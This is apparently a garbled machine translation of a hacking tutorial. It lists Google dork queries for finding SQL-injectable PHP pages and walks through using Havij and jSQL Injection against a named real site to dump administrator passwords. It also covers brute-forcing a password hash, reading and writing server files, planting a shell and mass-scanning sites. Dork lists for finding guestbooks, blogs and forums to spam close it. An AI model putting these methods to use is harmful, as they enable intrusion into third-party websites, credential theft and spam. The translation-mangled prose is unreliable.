inurl:readnews.php?id= inurl:top10.php?cat= inurl:newsone.php?id= inurl:event.php?id= inurl:product-item.php?id= inurl:sql. php?id= inurl:aboutbook.php?id= inurl:preview.php?id= inurl:loadpsb.php?id= inurl:pages.php?id= inurl:material.php?id= inurl:clanek.php4? id= inurl:announce.php?id= inurl:chappies.php?id= inurl:read.php?id= inurl:viewapp.php?id= inurl:viewphoto.php?id= inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:review.php?id= inurl:iniziativa.php?in= inurl:curriculum.php?id= inurl:labels.php?id= inurl:story.php?id= inurl: look.php? ID= inurl:newsone.php?id= inurl:aboutbook.php?id= inurl:material.php?id= inurl:opinions.php?id= inurl:announce.php?id= inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:tekst.php?idt= inurl:newscat.php?id= inurl:newsticker_info.php?idn= inurl:rubrika.php?idr= inurl:rubp.php?idr= inurl: offer.php?idf= inurl:art.php?idm= inurl:title.php?id= inurl:".php?id=1" inurl:".php?cat=1" inurl:".php?catid= 1" inurl:".php?num=1" inurl:".php?bid=1" inurl:".php?pid=1" inurl:".php?nid=1"

тэнхлэг нь жижиг жагсаалт юм. Та өөрийнхөө төлөө баталгаа гаргаж болно. Отже, бид сайтыг мэддэг байсан. Жишээ нь http://www.vestitambov.ru/
Энэ програмыг татаж авцгаая

**Нуугдсан контент: Агуулгын агуулгын хувьд манай нийтлэлийн тоо 3 ба түүнээс дээш байх ёстой.**

Тиснемо зүгээр. Дараа нь бид хохирогчийн сайтыг оруулна.
Тиснемо эхлэл. Дали үр дүнг шалгана.
Тиймээс програм нь SQL ялгааг мэддэг байсан.

Дали татаж Havij, http://www.vestitambov.ru:80/index.php?module=group_programs&id_gp= insert otrimane posilannya tudi. Хавижтай хэрхэн мэндлэхээ тайлбарлаж, татаж авахгүй, йог мэдэх нь чухал биш. Сахал. Та өөрт хэрэгтэй мэдээллээ авч хаясан - администраторын нууц үг, баруун талд энэ нь таны төсөөлөл юм.

P.S. Миний анхны бичих гэж оролдсон. Би яасан юм бэ гэж хашгирч байна

Файл дээр дарж ажиллуулна уу (виртуал машин шаардлагатай).

3. SQL-іn'єktsії сайтыг дахин шалгахад нэг цагийн турш нэрээ нууцлах

Kali Linux дээр Tor болон Privoxy суулгаж байна

[Худалдагчид тараасан]

Windows дээр Tor болон Privoxy суулгаж байна

[Худалдагчид тараасан]

jSQL Injection дахь проксигоор дамжуулан роботуудыг тохируулах

[Худалдагчид тараасан]

4. SQL-іn'єktsії z jSQL Injection дээр сайтыг дахин шалгаж байна

Хөтөлбөртэй ажиллах нь илүү хялбар байдаг. Сайтын хаягаа оруулаад ENTER дарахад л хангалттай.

Дараагийн дэлгэцийн агшин дээр та сайтад гурван төрлийн SQL-халдвар байгааг харж болно (тэдгээрийн талаарх мэдээллийг баруун доод буланд харуулав). Тарилгын нэрэн дээр дарснаар та сорох аргыг сольж болно.

Мөн бидэнд мэдээллийн санг аль хэдийн үзүүлсэн.

Та арьсны хүснэгтээс харж болно:

Хүснэгтүүдэд администраторын нэрийг дуугарга.

Хэрэв та азтай байсан бол администраторын мэдээллийг мэддэг байсан бол эрт байна. Мөн администратор, хаана өгөгдөл оруулахаа мэдэх шаардлагатай.

5. Админыг jSQL Injection ашиглан хайх

Хэнд зориулж дараагийн таб руу очно уу. Энд бид боломжит хаягийг хэлж байна. Та засварлахын тулд нэг буюу хэд хэдэн талыг сонгож болно:

Бусад хөтөлбөрт ялах шаардлагагүй хүмүүсийн амжилт.

Хөөрхий, хөөрхий программистууд, сарлагийн нууц үгийг хэт баян биш задгай хүнээс хадгалдаг. Нууц үгийн дарааллаар байнга оруулаарай

8743b52063cd84097a65d1633f5c74f5

Цэ хаш. Йогог харгис хүчээр тайлж болно. І… jSQL Injection нь бүдүүлэг хүчээр байж болно.

6. jSQL Injection-ийн тусламжийн ард хэшүүдийг Bruteforcing

Бусад програмуудыг ашиглах шаардлагагүй хүмүүс ухаалаг байх нь дамжиггүй. Энд хамгийн алдартай хэд хэдэн хэшүүд байна.

Хамгийн сайн сонголт биш. Хэшийг тайлах гуру болохын тулд орос хэлээр зөвлөж байна.

Гэхдээ өөр програм байхгүй эсвэл сургалт хийх цаг байхгүй бол brute-force функцтэй jSQL Injection нь илүү хүүхэд шиг байх нь ойлгомжтой.

Іsnuyu тохиргоо: та ямар тэмдэгтүүдийг тохируулж, нууц үг, нууц үгийн хүрээг оруулж болно.

7. SQL-ийн халдвар илэрсэний дараа файлуудтай хийх ажиллагаа

Өгөгдлийн сантай гэмт хэрэг үйлдэх - унших, өөрчлөх, SQL-ийн халдвар авсан тохиолдолд файлын халдлагыг даван туулах боломжтой.

• сервер дээрх файлуудыг унших
• Сервер дээрх шинэ файлуудын эрч хүч
• сервер дээрх shell vivantage

Бүх зүйл jSQL Injection-ээр хэрэгждэг!

Є солилцоо - SQL сервер нь файлын эрхтэй байж болно. Ухаалаг системийн администраторууд өмхий үнэртэй байгаа бөгөөд файлын системд хандах боломжгүй байна.

Файлын давуу эрх байгаа нь амархан буруугаар ойлгогддог. Табуудын аль нэг рүү шилжиж (файлуудыг унших, бүрхүүл үүсгэх, шинэ файл нээх) болон зориулалтын үйлдлүүдийн аль нэгийг хийж үзнэ үү.

Илүү чухал хүндэтгэл - бид дадлага хийх боломжтой файл руу хүрэх яг үнэмлэхүй замыг мэдэх хэрэгтэй - эс тэгвээс бид юу ч харахгүй.

Дараагийн дэлгэцийн агшинг харна уу:

Би файлтай үйлдлийг хийж үзэх эсэхээс үл хамааран бидэнд: FILE эрх байхгүй(Файлын эрх байхгүй). Мөн энд юу ч хийж чадахгүй.

Хэр натомист та өөр өршөөл үзүүлж байна вэ?

[сангийн_нэр] руу бичихэд асуудал гарсан

Энэ нь та файлыг бичихэд шаардлагатай үнэмлэхүй замыг буруу оруулсан гэсэн үг юм.

Үнэмлэхүй замыг сонгохын тулд дор хаяж ямар сервер ажиллаж байгааг мэдэх шаардлагатай. Үүний тулд Сүлжээний таб руу очно уу.

Ийм бичлэг (мөр Win64) Windows үйлдлийн системтэй баруун талд юу хийж болох талаар бидэнд зөвлөгөө өгнө үү:

Амьд байлгах: цаг хугацаа=5, дээд тал нь=99 Сервер: Apache/2.4.17 (Win64) PHP/7.0.0RC6 Холболт: Амьд байлгах арга: HTTP/1.1 200 OK Агуулгын урт: 353 Огноо: 12-р сарын 11, Баасан 11:48:31 GMT X-Powered-By: PHP/7.0.0RC6 Агуулгын төрөл: текст/html; charset=UTF-8

Энд бидэнд Unix-ийн хувилбар байна (*BSD, Linux):

Дамжуулах-кодлох: хэсэгчилсэн Огноо: Баасан, 2015 оны 12-р сарын 11 11:57:02 GMT Арга: HTTP/1.1 200 OK Амьд байлгах: цаг хугацаа=3, хамгийн ихдээ=100 Холболт: амьд байлгах Агуулгын төрөл: текст/html X- Powered-by: PHP/5.3.29 Сервер: Apache/2.2.31 (Unix)

Энд бидэнд CentOS байна:

Арга: HTTP/1.1 200 OK Дуусах хугацаа: 1981 оны 11-р сарын 19-ний Пүрэв, 08:52:00 GMT Set-Cookie: PHPSESSID=9p60gtunrv7g41iurr814h9rd0; path=/ Холболт: амьд байлгах X-Cache-Lookup: MISS like t1.hoster.ru:6666 Сервер: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.4.37 X-Cache: MISS like t1.hoster.ru Кэш-Хяналт: дэлгүүр байхгүй, кэш байхгүй, дахин баталгаажуулах ёстой, шалгалтын дараах=0, урьдчилан шалгах=0 Прагма: кэш байхгүй Огноо: 2015 оны 12-р сарын 11-ний Баасан, 12:08:54 GMT Дамжуулах-кодлох: хэсэгчилсэн контент-төрөл: текст/html; charset=WINDOWS-1251

Windows нь сайтуудад зориулсан ердийн хавтастай байдаг C:\Server\data\htdocs\. Гэхдээ, хэрэв та Windows дээр сервер ажиллуулах талаар "бодож" байгаа бол энэ хүн эрх ямбаны талаар огт бодоогүй байх. Эхлэхийн тулд C:/Windows/ лавлахаас дараах зүйлийг шууд оролдоно уу:

Сарлаг бачимо, бүх зүйл анх удаагаа гайхамшигтай болсон.

Гэхдээ jSQL Injection бүрхүүлүүд намайг sumniv гэж дуудаж байна. Хэрэв танд файлын эрх байгаа бол вэб интерфэйсээр юу ч авч болно.

8. SQL-іn'єktsії дээрх сайтуудыг бөөнөөр нь дахин шалгах

І jSQL Injection-д зориулж энэ функцийг чиглүүлнэ үү. Бүх зүйл илүү хялбар байдаг - сайтуудын жагсаалтыг оруулна уу (та үүнийг файлаас импортлох боломжтой), өөрчлөхийг хүсвэл үүнийг сонгоод үйлдлийг эхлүүлэх товчийг дарна уу.

jSQL тарилгын Wisnovok

jSQL Injection нь SQL тарилгын сайтуудаас олж авсан мэдлэгтэй тоглоом шоглоом хийх сайн, хэцүү хэрэгсэл юм. Төгсгөлгүй давуу талууд байдаг: сонголтын энгийн байдал, дагалдах функцүүдийн танилцуулга. jSQL Injection нь вэбсайтын дүн шинжилгээ хийх эхлэгчдэд хамгийн сайн найз байж болно.

Алдаа дутагдлуудаас би мэдээллийн санг засварлах боломжгүй талаар ярих байсан (ямар функцийг ашиглахаа мэдэхгүй байна). График интерфейс бүхий бүх хэрэгслүүдийн нэгэн адил програмууд нь скрипт дэх vikoristannya боломжгүй байдагтай холбоотой байж болох юм. Proteak автоматжуулалт боломжтой бөгөөд энэ програмд ​​​​та сайтуудыг бөөнөөр нь дахин шалгах функцийг эхлүүлж болно.

jSQL Injection програм нь sqlmap-аас хамаагүй дээр юм. Ale sqlmap нь илүү олон төрлийн SQL-ийн үйлдлийг нэмдэг бөгөөд файлын галт хана болон бусад функцуудтай ажиллах сонголттой байж болно.

Дэд баг: jSQL Injection бол хакерын хамгийн сайн найз юм.

Та энэ програмын хураангуйг Кали Линукс нэвтэрхий толь дээрээс олж болно: http://kali.tools/?p=706

Сарлаг зөв Shukat тусламж google.com

Хүн бүр Google шиг ийм хуурамч системтэй хамт дуулж чадна =) Гэхдээ хэрэв та нэмэлт тусгай загварт зориулсан хуурамч хүсэлтийг хэрхэн зөв зохиохоо мэдэхгүй бол илүү үр дүнтэй, илүү үр дүнтэй байх болно. =) мөн та хэрхэн ажиллах хэрэгтэй, зөв ​​шукати

Google нь google.com дээрх хайлтын цагийн хувьд онцгой үнэ цэнэтэй байж болох хайлтын хэд хэдэн өргөтгөлийн операторуудыг дэмждэг. Ер нь qi операторууд хайлтаа өөрчилдөг эсвэл Google-д огт өөр төрлийн хайлт хийдэг юм шиг санагддаг. Жишээлбэл, барилгын ажил холбоос:є тусгай оператороор, тэр холбоос: www.google.comБи танд энгийн хошигнол хэлэхгүй, гэхдээ бүх вэб сайтууд, google.com руу хэрхэн холбоос хийх талаар олж мэдье.
өөр төрлийн ундаа

кэш:Хэрэв та хүсэлтэд өөр үг оруулах юм бол Google кэшэд хадгалагдсан баримт бичгийн хил хязгаарт орсон үгсийн тоог тодотгох болно.
Жишээлбэл, кэш: www.web сайт"вэб" гэсэн үгийн тусламжтайгаар бэлэн мөнгө хийхийг харуулах.

холбоос:Данийн хайлтын хүсэлт нь танд хүссэн хүсэлтээ гаргах боломжтой вэб хуудсуудыг харуулах болно.
Жишээлбэл: холбоос: www.websiteбүх талыг харуулах, үүнийг є http://www.site-аас авна уу

холбоотой:Заасан вэб талтай "ижил төстэй" (холбоотой) вэб хуудсыг үзэх.
Жишээлбэл, холбоотой: www.google.com perehuє вэб-талууд, yakі є podіbimi гэртээ ї storіnki Google.

мэдээлэл:Хүсэлтийн мэдээлэл: вэб хуудасны хүсэлтийн талаар Google-д байгаа мэдээлэл бага зэрэг өгнө үү.
Жишээлбэл, мэдээлэл: вэб сайтманай форумын талаарх мэдээллийг харуулах =) (Армада - Насанд хүрэгчдийн вэбмастер форум).

Бусад мэдээллийн хүсэлт

тодорхойлох:Хүсэлтийг тодорхойлох: янз бүрийн нэхсэн торны утаснуудаас сонгосны дагуу захиалгын дараа хэрхэн оруулах талаар тодорхой үгсээр хангах. Энэ нь бүх оруулсан хэллэгт хуваарилагдах болно (ингэснээр бид бүх үгсийг яг асуулгад оруулсан болно).

Хувьцаа:Хувьцааны хүсэлтийг хэрхэн эхлүүлэх вэ: Google нь солилцооны холбоосын тэмдэг болгон нөхцөлийн шийдвэрийг боловсруулж, гуравдагч этгээдтэй холбоо барина, ингэснээр эдгээр тэмдгүүдийн мэдээллийг харуулдаг.
Жишээлбэл, Хувьцаа: Intel Yahoo Intel болон Yahoo-ийн талаарх мэдээллийг харуулах. (Компанийн нэрийг дурдаагүй үлдсэн шинэлэг зүйлсийн тэмдэгтийг зөрчиж ямар буруутайг тогтооно уу)

Өөрчлөгчийг хүсэх

сайт:Хэрэв та сайтыг оруулбал таны асуулгад Google тухайн домэйнд байгаа таны мэдэх вэб сайтуудын үр дүнг хүрээлэх болно.
Та мөн ru, org, com гэх мэт бусад бүсээс хайх боломжтой ( сайт: com сайт: ru)

бүх нэр:Хэрэв та allintitle:-ийн хүсэлтийг ажиллуулбал Google гарчигт хамгийн олон үг агуулсан үр дүнг хүрээлдэг.
Жишээлбэл, allintitle: google хайлтЗураг, блог гэх мэт хайлт хийхийн тулд google-ийн бүх талыг эргүүлээрэй

гарчиг:Мөн та гарчиг оруулах болно: таны хүсэлтээр Google гарчигийн үгийг орлуулахын тулд үр дүнгийн баримт бичгүүдээр хүрээлүүлнэ.
Жишээлбэл, гарчиг: Бизнес

allinurl:Тэгэхээр та allinurl-ээр асуулга ажиллуулна уу: Google-ийн үр дүнг боож, URL-ыг цөөн үгээр хай.
Жишээлбэл, allinurl: google хайлтБаримт бичгийг google-ээс эргүүлж гарчигнаас нь хайна уу. Мөн сонголт болгон та налуу зураас (/) бүхий үгсийг нэг талын хил дээр гомдсон налуу зураастай ижил үгсийг хувааж болно: өгзөг allinurl: foo/bar

inurl:Та мөн inurl-г оруулж болно: таны хүсэлтээр Google URL дээрх үгийг устгахын тулд үр дүнгийн баримт бичгүүдээр хүрээлүүлнэ.
Жишээлбэл, Animation inurl:вэб сайт

текст:хошигнох нь зөвхөн хажуугийн текстэнд үг оноож, дагавар залгасан бичвэрийн нэрийг үл тоомсорлож, урьд өмнө байгаагүй. Мөн тэр хувиргагчийн өртөг - бүх текст: tobto. Хүсэлтэд байгаа бүх үгсийг зөвхөн текст дотор хольсон байх болно, энэ нь бас чухал бөгөөд мессежэнд ихэвчлэн давтагддаг үгсийг үл тоомсорлодог.
Жишээлбэл, текст: форум

огнооны хүрээ:цаг хугацааны хүрээнд shukaє (огноо: 2452389-2452389), цагийн огноог Жулиан форматаар зааж өгсөн болно.

За тэгээд бүх төрлийн царцаанууд ундаа уудаг

Google-д зориулж эвхэх хүсэлт гаргах. Спам илгээгчийн хувьд

inurl:control.guest?a=sign

Site:books.dreambook.com "Нүүр хуудасны URL" "Миний гарын үсэг зурах" inurl:sign

Сайт: www.freegb.net Нүүр хуудас

Inurl:sign.asp "Тэмдэгтийн тоо"

"Мессеж:" inurl:sign.cfm "Илгээгч:"

inurl:register.php "Хэрэглэгчийн бүртгэл" "Вэб сайт"

Inurl:edu/зочны дэвтэр “Зочны дэвтэрт гарын үсэг зурах”

Inurl: "Сэтгэгдэл бичих" нийтлэл "URL"

Inurl:/архив/ "Сэтгэгдэл:" "Мэдээллийг санаж байна уу?"

“Скрипт болон зочны дэвтэр үүсгэсэн:” “URL:” “Сэтгэгдэл:”

inurl:?action="phpBook" "URL" нэмэх

Гарчиг: "Шинэ өгүүллэг илгээх"

Сэтгүүлүүд

inurl:www.livejournal.com/users/mode=reply

inurl greatestjournal.com/mode=reply

Inurl:fastbb.ru/re.pl?

Inurl:fastbb.ru/re.pl? "Зочны ном"

Блогууд

Inurl:blogger.com/comment.g?"postID""нэргүй"

Inurl:typepad.com/ "Сэтгэгдэл бичих" "Хувийн мэдээллийг санаж байна уу?"

Inurl:greatestjournal.com/community/ "Сэтгэгдэл бичих" "Нэргүй зурагт хуудасны хаяг"

"Сэтгэгдэл бичих" "нэргүй зурагт хуудасны хаяг" -

Гарчиг: "Сэтгэгдэл бичих"

Inurl:pirillo.com "Сэтгэгдэл бичих"

форум

Inurl:gate.html?"name=Форум" "mode=reply"

inurl:”forum/posting.php?mode=reply”

inurl: "mes.php?"

inurl: "members.html"

inurl:forum/memberlist.php?"